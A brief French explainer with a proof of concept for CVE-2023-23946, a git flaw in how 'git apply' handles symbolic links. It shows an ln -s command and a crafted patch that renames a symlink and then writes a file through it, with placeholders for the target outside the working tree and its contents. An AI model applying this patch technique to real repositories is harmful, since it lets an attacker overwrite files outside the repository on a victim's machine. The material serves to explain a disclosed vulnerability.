
Explication et POC de la CVE-2023-23946
Explication et POC de la CVE-2023-23946
La vulnérabilité CVE-2023-23946 est causée par une faille dans la façon dont git gère les liens symboliques. Lorsque git crée un lien symbolique, il ne le traite pas réellement comme un lien symbolique et, à cause de cela, nous pouvons l'exploiter pour pointer vers des fichiers en dehors de l'arbre de travail.
ln -s [CHEMIN_QUE_VOUS_VOULEZ_ACCEDER_EN_DEHORS_DE_LARBRE_DE_TRAVAIL] symlink
diff --git a/symlink b/newsymlink
rename from symlink
rename to newsymlink
--
diff --git /dev/null b/newsymlink/spawn
new file mode 100644
index 0000000..e47f4ea
--- /dev/null
+++ b/newsymlink/[FICHIER_EXTERIEUR]
@@ -0,0 +1 @@
+[CE_QUE_VOUS_VOULEZ_A_L_INTERIEUR_DU_FICHIER]
\ No newline at end of file
Que fait le patch ? Nous changeons le nom du lien symbolique existant et créons un nouveau fichier. Ainsi, lorsque nous modifions /newsymlink/[FICHIER_EXTERIEUR], git n'applique pas ses protections contre les liens symboliques.